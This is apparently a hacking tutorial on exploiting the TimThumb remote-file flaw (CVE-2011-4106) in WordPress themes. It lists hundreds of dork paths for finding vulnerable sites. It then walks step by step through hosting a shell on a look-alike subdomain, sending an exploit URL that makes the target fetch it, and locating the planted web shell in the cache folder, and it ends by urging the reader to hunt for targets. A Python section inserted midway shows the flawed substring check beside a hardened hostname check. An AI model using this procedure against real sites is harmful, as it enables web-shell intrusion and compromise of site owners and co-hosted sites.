The TimThumb exploit for WordPress is a hacking technique that abuses a bug in timthumb.php (also shipped under the name thumb.php). Magazine-style themes that show thumbnails on the index page usually bundle a copy of timthumb.php. The bug in this file can be used as an entry point, the first goal being to plant a web shell on the target site. Once one site has a shell on it, other websites hosted on the same server may end up compromised too, depending on how well the hosting isolates accounts.
Background for anyone assessing exposure: this is the remote-file flaw disclosed in August 2011 (CVE-2011-4106), which affects TimThumb versions before 2.0. Those versions fetched images from an allow-list of external hosts, but matched the allowed names as substrings of the requested URL rather than comparing the parsed hostname, and wrote the fetched file into a web-accessible cache directory. TimThumb 2.0 and later check the hostname properly and disable external fetching by default, so only themes still bundling an old copy are affected.
Okay, let's get straight to it rather than dragging things out.
TimThumb dorks:
/wp-content/themes/TheStyle/timthumb.php
/wp-content/themes/nool/timthumb.php
/wp-content/themes/PersonalPress/timthumb.php
/wp-content/themes/SimplePress/timthumb.php
/wp-content/themes/DeepFocus/timthumb.php
/wp-content/themes/DelicateNews/timthumb.php
/wp-content/themes/Bold/timthumb.php
/wp-content/themes/eStore/timthumb.php
/wp-content/themes/TheProfessional/timthumb.php
/wp-content/themes/OnTheGo/timthumb.php
/wp-content/themes/AskIt/timthumb.php
/wp-content/themes/Nova/timthumb.php
/wp-content/themes/eNews/timthumb.php
/wp-content/themes/eVid/timthumb.php
/wp-content/themes/TheCorporation/timthumb.php
/wp-content/themes/Minimal/timthumb.php
/wp-content/themes/Polished/timthumb.php
/wp-content/themes/MyResume/timthumb.php
/wp-content/themes/TheSource/timthumb.php
/wp-content/themes/StudioBlue/timthumb.php
/wp-content/themes/Wooden/timthumb.php
/wp-content/themes/WhosWho/timthumb.php
/wp-content/themes/Quadro/timthumb.php
/wp-content/themes/Glow/timthumb.php
/wp-content/themes/Modest/timthumb.php
/wp-content/themes/Aggregate/timthumb.php
/wp-content/themes/ArtSee/timthumb.php
/wp-content/themes/versatile/timthumb.php
/wp-content/themes/omni-shop/timthumb.php
/wp-content/themes/manifesto/scripts/timthumb.php
/wp-content/themes/arthem-mod/scripts/timthumb.php
/wp-content/themes/echoes/timthumb.php
/wp-content/themes/Bold4/timthumb.php
/wp-content/themes/primely-theme/scripts/timthumb.php
/wp-content/themes/zenkoreviewRD/scripts/timthumb.php
/wp-content/themes/ElegantEstate/timthumb.php
/wp-content/themes/PersonalPress2/timthumb.php
/wp-content/themes/mypage/scripts/timthumb.php
/wp-content/themes/magazinum/scripts/timthumb.php
/wp-content/themes/pbv_multi/scripts/timthumb.php
/wp-content/themes/photofeature/scripts/timthumb.php
/wp-content/themes/ColdStone/timthumb.php
/wp-content/themes/HMDeepFocus/timthumb.php
/wp-content/themes/EarthlyTouch/timthumb.php
/wp-content/themes/Boutique/timthumb.php
/wp-content/themes/ePhoto/timthumb.php
/wp-content/themes/PureType/timthumb.php
/wp-content/themes/13Floor/timthumb.php
/wp-content/themes/BusinessCard/timthumb.php
/wp-content/themes/CherryTruffle/timthumb.php
/wp-content/themes/Cion/timthumb.php
/wp-content/themes/DailyNotes/timthumb.php
/wp-content/themes/eGallery/timthumb.php
/wp-content/themes/eGamer/timthumb.php
/wp-content/themes/GrungeMag/timthumb.php
/wp-content/themes/Influx/timthumb.php
/wp-content/themes/LightBright/timthumb.php
/wp-content/themes/LightSource/timthumb.php
/wp-content/themes/Magnificent/timthumb.php
/wp-content/themes/Memoir/timthumb.php
/wp-content/themes/AskIt_v1.6/AskIt/timthumb.php
/wp-content/themes/TidalForce/timthumb.php
/wp-content/themes/Atlantis/timthumb.php
/wp-content/themes/DelicateNewsYellow/timthumb.php
/wp-content/themes/themorningafter/timthumb.php
/wp-content/themes/arthemia-premium/scripts/timthumb.php
/wp-content/themes/arthemia/scripts/timthumb.php
/wp-content/themes/arthemia-premium-park/scripts/timthumb.php
/wp-content/themes/linepress/timthumb.php
/wp-content/themes/wedding/timthumb.php
/wp-content/themes/graduate/timthumb.php
/wp-content/themes/wp-newspaper/timthumb.php
/wp-content/themes/advanced-newspaper/timthumb.php
/wp-content/themes/journey/timthumb.php
/wp-content/themes/newspro/timthumb.php
/wp-content/themes/transcript/timthumb.php
/wp-content/themes/showfolio/timthumb.php
/wp-content/themes/quickstart/timthumb.php
/wp-content/themes/Restorante/timthumb.php
/wp-content/themes/snapwire/timthumb.php
/wp-content/themes/aqua-blue/includes/timthumb.php
/wp-content/themes/swatch/functions/thumb.php
/wp-content/themes/announcement/functions/thumb.php
/wp-content/themes/empire/functions/thumb.php
/wp-content/themes/supportpress/functions/thumb.php
/wp-content/themes/editorial/functions/thumb.php
/wp-content/themes/statua/functions/thumb.php
/wp-content/themes/briefed/functions/thumb.php
/wp-content/themes/faultpress/functions/thumb.php
/wp-content/themes/kaboodle/functions/thumb.php
/wp-content/themes/savinggrace/functions/thumb.php
/wp-content/themes/premiere/functions/thumb.php
/wp-content/themes/simplicity/functions/thumb.php
/wp-content/themes/deliciousmagazine/functions/thumb.php
/wp-content/themes/canvas-buddypress/functions/thumb.php
/wp-content/themes/bookclub/functions/thumb.php
/wp-content/themes/boldnews/functions/thumb.php
/wp-content/themes/placeholder/functions/thumb.php
/wp-content/themes/biznizz/functions/thumb.php
/wp-content/themes/auld/functions/thumb.php
/wp-content/themes/listings/functions/thumb.php
/wp-content/themes/elefolio/functions/thumb.php
/wp-content/themes/chapters/functions/thumb.php
/wp-content/themes/continuum/functions/thumb.php
/wp-content/themes/diner/functions/thumb.php
/wp-content/themes/skeptical/functions/thumb.php
/wp-content/themes/caffeinated/functions/thumb.php
/wp-content/themes/crisp/functions/thumb.php
/wp-content/themes/sealight/functions/thumb.php
/wp-content/themes/unite/functions/thumb.php
/wp-content/themes/estate/functions/thumb.php
/wp-content/themes/tma/functions/thumb.php
/wp-content/themes/coda/functions/thumb.php
/wp-content/themes/inspire/functions/thumb.php
/wp-content/themes/apz/functions/thumb.php
/wp-content/themes/spectrum/functions/thumb.php
/wp-content/themes/diarise/functions/thumb.php
/wp-content/themes/boast/functions/thumb.php
/wp-content/themes/retreat/functions/thumb.php
/wp-content/themes/cityguide/functions/thumb.php
/wp-content/themes/cinch/functions/thumb.php
/wp-content/themes/slanted/functions/thumb.php
/wp-content/themes/canvas/functions/thumb.php
/wp-content/themes/postcard/functions/thumb.php
/wp-content/themes/delegate/functions/thumb.php
/wp-content/themes/mystream/functions/thumb.php
/wp-content/themes/optimize/functions/thumb.php
/wp-content/themes/backstage/functions/thumb.php
/wp-content/themes/sophisticatedfolio/functions/thumb.php
/wp-content/themes/bueno/functions/thumb.php
/wp-content/themes/digitalfarm/functions/thumb.php
/wp-content/themes/headlines/functions/thumb.php
/wp-content/themes/f0101/functions/thumb.php
/wp-content/themes/royalle/functions/thumb.php
/wp-content/themes/exposure/functions/thumb.php
/wp-content/themes/rockstar/functions/thumb.php
/wp-content/themes/dailyedition/functions/thumb.php
/wp-content/themes/object/functions/thumb.php
/wp-content/themes/antisocial/functions/thumb.php
/wp-content/themes/coffeebreak/functions/thumb.php
/wp-content/themes/mortar/functions/thumb.php
/wp-content/themes/bigeasy/functions/thumb.php
/wp-content/themes/groovyphoto/functions/thumb.php
/wp-content/themes/groovyblog/functions/thumb.php
/wp-content/themes/mainstream/functions/thumb.php
/wp-content/themes/featurepitch/functions/thumb.php
/wp-content/themes/suitandtie/functions/thumb.php
/wp-content/themes/thejournal/functions/thumb.php
/wp-content/themes/myweblog/functions/thumb.php
/wp-content/themes/aperture/functions/thumb.php
/wp-content/themes/metamorphosis/functions/thumb.php
/wp-content/themes/bloggingstream/functions/thumb.php
/wp-content/themes/thestation/functions/thumb.php
/wp-content/themes/groovyvideo/functions/thumb.php
/wp-content/themes/productum/functions/thumb.php
/wp-content/themes/newsport/functions/thumb.php
/wp-content/themes/irresistible/functions/thumb.php
/wp-content/themes/cushy/functions/thumb.php
/wp-content/themes/wootube/functions/thumb.php
/wp-content/themes/forewordthinking/functions/thumb.php
/wp-content/themes/geometric/functions/thumb.php
/wp-content/themes/abstract/functions/thumb.php
/wp-content/themes/busybee/functions/thumb.php
/wp-content/themes/blogtheme/functions/thumb.php
/wp-content/themes/gothamnews/functions/thumb.php
/wp-content/themes/thick/functions/thumb.php
/wp-content/themes/typebased/functions/thumb.php
/wp-content/themes/overeasy/functions/thumb.php
/wp-content/themes/ambience/functions/thumb.php
/wp-content/themes/snapshot/functions/thumb.php
/wp-content/themes/openair/functions/thumb.php
/wp-content/themes/freshfolio/functions/thumb.php
/wp-content/themes/papercut/functions/thumb.php
/wp-content/themes/proudfolio/functions/thumb.php
/wp-content/themes/vibrantcms/functions/thumb.php
/wp-content/themes/freshnews/functions/thumb.php
/wp-content/themes/livewire/functions/thumb.php
/wp-content/themes/gazette/functions/thumb.php
/wp-content/themes/flashnews/functions/thumb.php
/wp-content/themes/premiumnews/functions/thumb.php
/wp-content/themes/newspress/functions/thumb.php
/wp-content/themes/8q/scripts/timthumb.php
/wp-content/themes/aerial/lib/timthumb.php
/wp-content/themes/aesthete/timthumb.php
/wp-content/themes/albizia/includes/timthumb.php
/wp-content/themes/amphion-lite/script/timthumb.php
/wp-content/themes/aranovo/scripts/timthumb.php
/wp-content/themes/arras/library/timthumb.php
/wp-content/themes/arras-theme/library/timthumb.php
/wp-content/themes/arthemix-bronze/scripts/timthumb.php
/wp-content/themes/artisan/includes/timthumb.php
/wp-content/themes/arthemix-green/scripts/timthumb.php
/wp-content/themes/a-simple-business-theme/scripts/timthumb.php
/wp-content/themes/a-supercms/timthumb.php
/wp-content/themes/aureola/scripts/timthumb.php
/wp-content/themes/aurorae/timthumb.php
/wp-content/themes/autofashion/thumb.php
/wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/timthumb.php
/wp-content/themes/bikes/thumb.php
/wp-content/themes/automotive-blog-theme/timthumb.php
/wp-content/themes/black_eve/timthumb.php
/wp-content/themes/blex/scripts/timthumb.php
/wp-content/themes/bloggnorge-a1/scripts/timthumb.php
/wp-content/themes/blogified/timthumb.php
/wp-content/themes/blue-corporate-hyve-theme/timthumb.php
/wp-content/themes/bluemag/library/timthumb.php
/wp-content/themes/blue-news/scripts/timthumb.php
/wp-content/themes/bombax/includes/timthumb.php
/wp-content/themes/breakingnewz/timthumb.php
/wp-content/themes/brightsky/scripts/timthumb.php
/wp-content/themes/brochure-melbourne/includes/timthumb.php
/wp-content/themes/business-turnkey/assets/js/timthumb.php
/wp-content/themes/calotropis/includes/timthumb.php
/wp-content/themes/coffee-lite/thumb.php
/wp-content/themes/comet/scripts/timthumb.php
/wp-content/themes/conceditor-wp-strict/scripts/timthumb.php
/wp-content/themes/constructor/layouts/thumb.php
/wp-content/themes/constructor/libs/timthumb.php
/wp-content/themes/constructor/timthumb.php
/wp-content/themes/coverht-wp/scripts/timthumb.php
/wp-content/themes/cover-wp/scripts/timthumb.php
/wp-content/themes/dark-dream-media/timthumb.php
/wp-content/themes/deep-blue/timthumb.php
/wp-content/themes/delicate/thumb.php
/wp-content/themes/diamond-ray/thumb.php
/wp-content/themes/dieselclothings/thumb.php
/wp-content/themes/digitalblue/thumb.php
/wp-content/themes/dimenzion/timthumb.php
/wp-content/themes/epione/script/timthumb.php
/wp-content/themes/evr-green/scripts/timthumb.php
/wp-content/themes/famous/megaframe/megapanel/inc/upload.php
/wp-content/themes/famous/timthumb.php
/wp-content/themes/fashion-style/thumb.php
/wp-content/themes/featuring/timthumb.php
/wp-content/themes/fliphoto/timthumb.php
/wp-content/themes/flix/timthumb.php
/wp-content/themes/fordreporter/scripts/thumb.php
/wp-content/themes/freeside/thumb.php
/wp-content/themes/fresh-blu/scripts/timthumb.php
/wp-content/themes/go-green/modules/timthumb.php
/wp-content/themes/granite-lite/scripts/timthumb.php
/wp-content/themes/greydove/timthumb.php
/wp-content/themes/greyzed/functions/efrog/lib/timthumb.php
/wp-content/themes/gunungkidul/thumb.php
/wp-content/themes/heartspotting-beta/thumb.php
/wp-content/themes/heli-1-wordpress-theme/images/timthumb.php
/wp-content/themes/ideatheme/timthumb.php
/wp-content/themes/impressio/timthumb/timthumb.php
/wp-content/themes/introvert/thumb.php
/wp-content/themes/inuit-types/thumb.php
/wp-content/themes/isotherm-news/thumb.php
/wp-content/themes/iwana-v10/timthumb.php
/wp-content/themes/jambo/thumb.php
/wp-content/themes/jcblackone/thumb.php
/wp-content/themes/kratalistic/thumb.php
/wp-content/themes/life-style-free/thumb.php
/wp-content/themes/likehacker/timthumb.php
/wp-content/themes/litepress/scripts/timthumb.php
/wp-content/themes/loganpress-premium-theme-1/thumb.php
/wp-content/themes/magazine-basic/thumb.php
/wp-content/themes/magup/timthumb.php
/wp-content/themes/make-money-online-theme-1/scripts/timthumb.php
/wp-content/themes/make-money-online-theme-2/scripts/timthumb.php
/wp-content/themes/make-money-online-theme-3/scripts/timthumb.php
/wp-content/themes/make-money-online-theme-4/scripts/timthumb.php
/wp-content/themes/make-money-online-theme/scripts/timthumb.php
/wp-content/themes/meintest/layouts/thumb.php
/wp-content/themes/mobilephonecomparision/thumb.php
/wp-content/themes/moi-magazine/timthumb.php
/wp-content/themes/my-heli/images/timthumb.php
/wp-content/themes/mymag/timthumb.php
/wp-content/themes/mystique/extensions/auto-thumb/timthumb.php
/wp-content/themes/nash/theme-assets/php/timthumb.php
/wp-content/themes/neofresh/timthumb.php
/wp-content/themes/neo_wdl/includes/extensions/thumb.php
/wp-content/themes/new-green-natural-living-ngnl/scripts/timthumb.php
/wp-content/themes/newspress/thumb.php
/wp-content/themes/pearlie/scripts/timthumb.php
/wp-content/themes/pico/scripts/timthumb.php
/wp-content/themes/postage-sydney/includes/timthumb.php
/wp-content/themes/premium-violet/thumb.php
/wp-content/themes/probluezine/timthumb.php
/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
/wp-content/themes/pronto/cjl/pronto/uploadify/uploadify.php
/wp-content/themes/r755/thumb.php
/wp-content/themes/regal/timthumb.php
/wp-content/themes/shaan/timthumb.php
/wp-content/themes/shadow-block/thumb.php
/wp-content/themes/shadow/timthumb.php
/wp-content/themes/simple-but-great/timthumb.php
/wp-content/themes/simplenews_premium/scripts/timthumb.php
/wp-content/themes/simple-red-theme/timthumb.php
/wp-content/themes/simple-tabloid/thumb.php
/wp-content/themes/simplewhite/timthumb.php
/wp-content/themes/slidette/timThumb/timthumb.php
/wp-content/themes/snowblind_colbert/thumb.php
/wp-content/themes/snowblind/thumb.php
/wp-content/themes/spotlight/timthumb.php
/wp-content/themes/squeezepage/timthumb.php
/wp-content/themes/standout/thumb.php
/wp-content/themes/suffusion/timthumb.php
/wp-content/themes/swift/includes/thumb.php
/wp-content/themes/swift/includes/timthumb.php
/wp-content/themes/swift/timthumb.php
/wp-content/themes/techozoic-fluid/options/thumb.php
/wp-content/themes/the_dark_os/tools/timthumb.php
/wp-content/themes/themetiger-fashion/thumb.php
/wp-content/themes/theory/thumb.php
/wp-content/themes/the-theme/core/libs/thumbnails/thumb.php
/wp-content/themes/thrillingtheme/thumb.php
/wp-content/themes/tm-theme/js/timthumb.php
/wp-content/themes/totallyred/scripts/timthumb.php
/wp-content/themes/travelogue-theme/scripts/timthumb.php
/wp-content/themes/true-blue-theme/timthumb.php
/wp-content/themes/ttnews-theme/timthumb.php
/wp-content/themes/typographywp/timthumb.php
/wp-content/themes/ugly/timthumb.php
/wp-content/themes/unity/timthumb.php
/wp-content/themes/versitility/timthumb.php
/wp-content/themes/vibefolio-teaser-10/scripts/timthumb.php
/wp-content/themes/vina/thumb.php
/wp-content/themes/whitemag/script/thumb.php
/wp-content/themes/wpapi/thumb.php
/wp-content/themes/wpbus-d4/includes/timthumb.php
/wp-content/themes/wp-creativix/scripts/timthumb.php
/wp-content/themes/wp-newsmagazine/scripts/timthumb.php
/wp-content/themes/wp-perfect/js/timthumb.php
/wp-content/themes/wp-premium-orange/timthumb.php
/wp-content/themes/xiando-one/thumb.php
/wp-content/themes/zcool-like/timthumb.php
/wp-content/themes/zcool-like/uploadify.php
/wp-content/themes/twittplus/scripts/timthumb.php
Search Google for the dorks above and pick one of the sites.
For example, say I got this target:
http://www.target.com/wp-content/themes/wp-premium-orange/timthumb.php
We just have to feed it a malicious URL. Remember that TimThumb only allows thumbnails to be generated from a handful of external sites, such as blogger.com, picasa.com, wordpress.org and so on
(open the timthumb script itself to see the exact allow-list).
So what do we do if our site is not on that list? Good question, and the short answer is: "we create a subdomain that looks like one of those sites". The vulnerable versions only check whether an allowed name appears somewhere in the URL, not whether the hostname actually is that site.
Example: blogger.com.websitekamu.com | picasa.com.websitekamu.org, etc.
Once we have created, say, "picasa.com.websitekamu.org", we upload a shell with a .gif, .jpeg or .txt extension:
For example:
picasa.com.websitekamu.org/shell.txt
picasa.com.websitekamu.org/shell.php.jpeg
picasa.com.websitekamu.org/shell.php.gif
Back to the target from above:
http://www.target.com/wp-content/themes/wp-premium-orange/timthumb.php
We only need to append a query string, so it becomes:
http://www.target.com/wp-content/themes/wp-premium-orange/timthumb.php?src=picasa.com.websitekamu.org/shell.txt?
Why did I add the question mark after "/shell.txt"?
"So that the file gets read as PHP on the target", or so I have heard.
If it works, the fetched file is usually stored under a filename derived from an MD5 hash (a hash, not encryption: the same input always gives the same name).
Now we check: on some themes the thumbnails live in a /temp folder, on others in /cache.
Try them one by one:
http://www.target.com/wp-content/themes/wp-premium-orange/temp
http://www.target.com/wp-content/themes/wp-premium-orange/cache
Occasionally a site has directory listing enabled on that folder, so this part is a matter of luck.
Then all that is left is to request it, right?
http://www.target.com/wp-content/themes/wp-premium-orange/cache/<the MD5 from before>.php
In my experience the MD5 is usually already displayed on the timthumb page itself when it throws an error.
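The whole trick above rests on one mistake: the allow-list is checked as a substring of the raw src value. The Python below is an added example, not TimThumb's own code and not from the original post: it reconstructs a substring check of that kind next to a hardened one that parses the hostname, and shows a cache-naming scheme that can never produce a .php file. The attacker hostnames (picasa.com.websitekamu.org, websitekamu.org) are the tutorial's own placeholders; the allow-list contents, function names, the .img cache extension and the extra userinfo ("picasa.com@websitekamu.org") case are assumptions added here to show the general pattern rather than only the tutorial's URL.

```python
"""
Host allow-list check for a remote-image thumbnailer: the substring pattern the
tutorial abuses, beside a hardened version.  Illustrative reconstruction, not
TimThumb's code.
"""
import hashlib
from typing import Dict, Optional
from urllib.parse import urlsplit

# Illustrative allow-list; the tutorial names blogger.com, picasa.com and
# wordpress.org as examples of hosts the script will fetch from.
ALLOWED_HOSTS = ("blogger.com", "picasa.com", "wordpress.org")
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")

# Tutorial placeholders (attacker-controlled); constructed sample input.
TUTORIAL_URLS = (
    "picasa.com.websitekamu.org/shell.txt?",
    "picasa.com.websitekamu.org/shell.php.jpeg",
    "picasa.com.websitekamu.org/shell.php.gif",
)


def _with_scheme(src: str) -> str:
    """Scheme-less values, as in the tutorial's URLs, are treated as http://."""
    return src if "://" in src else "http://" + src


def weak_is_allowed(src: str) -> bool:
    """Substring match on the raw src parameter (the flawed pattern).
    'picasa.com.websitekamu.org/shell.txt?' contains 'picasa.com', so it passes."""
    return any(site in src for site in ALLOWED_HOSTS)


def _hostname(src: str) -> Optional[str]:
    """Lowercased hostname of src (port and userinfo stripped), or None if the
    scheme is not http(s) or there is no host at all."""
    parts = urlsplit(_with_scheme(src))
    if parts.scheme not in ("http", "https"):
        return None
    return parts.hostname


def strict_is_allowed(src: str) -> bool:
    """Hardened check: the parsed host must equal an allowed host or be a
    subdomain of it (label boundary enforced by the leading dot).
    'picasa.com.websitekamu.org' ends in '.websitekamu.org', so it fails."""
    host = _hostname(src)
    if host is None:
        return False
    return any(host == site or host.endswith("." + site) for site in ALLOWED_HOSTS)


def has_image_extension(src: str) -> bool:
    """Extension check on the URL *path* only.  A trailing '?' just opens an
    empty query string, so 'shell.txt?' has path '/shell.txt'.  Note this alone
    does nothing against 'shell.php.gif': the cache naming below is what
    stops such a file from ever becoming executable."""
    path = urlsplit(_with_scheme(src)).path.lower()
    return path.endswith(IMAGE_EXTENSIONS)


def safe_cache_path(src: str, cache_dir: str = "cache") -> str:
    """Cache name derived from a hash of src plus a fixed, non-executable
    extension (assumed .img here), so nothing the attacker controls reaches
    the file name and no *.php can ever be written into the web root."""
    digest = hashlib.sha256(src.encode()).hexdigest()
    return f"{cache_dir}/external_{digest}.img"


def evaluate(src: str) -> Dict[str, object]:
    """Run every check on one src value; used by the demo and the test."""
    return {
        "src": src,
        "weak": weak_is_allowed(src),
        "strict": strict_is_allowed(src),
        "image_ext": has_image_extension(src),
        "cache_path": safe_cache_path(src),
    }


if __name__ == "__main__":
    samples = TUTORIAL_URLS + (
        "http://picasa.com@websitekamu.org/shell.php.gif",  # userinfo trick
        "https://lh3.picasa.com/album/photo.jpg",           # legitimate subdomain
    )
    for s in samples:
        r = evaluate(s)
        print(f"{s:50} weak={r['weak']!s:5} strict={r['strict']!s:5} "
              f"image_ext={r['image_ext']!s:5} -> {r['cache_path']}")
```

Run it and every tutorial URL passes weak_is_allowed and fails strict_is_allowed, while a real picasa.com subdomain still passes. The "user@host" form is included because a substring check is fooled by it just as easily as by the fake subdomain, and urlsplit().hostname discards the userinfo part, which is why the hardened check compares the parsed hostname and nothing else.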
Okay, that's all for this tutorial. Keep trying, and be patient when hunting for targets. Good luck.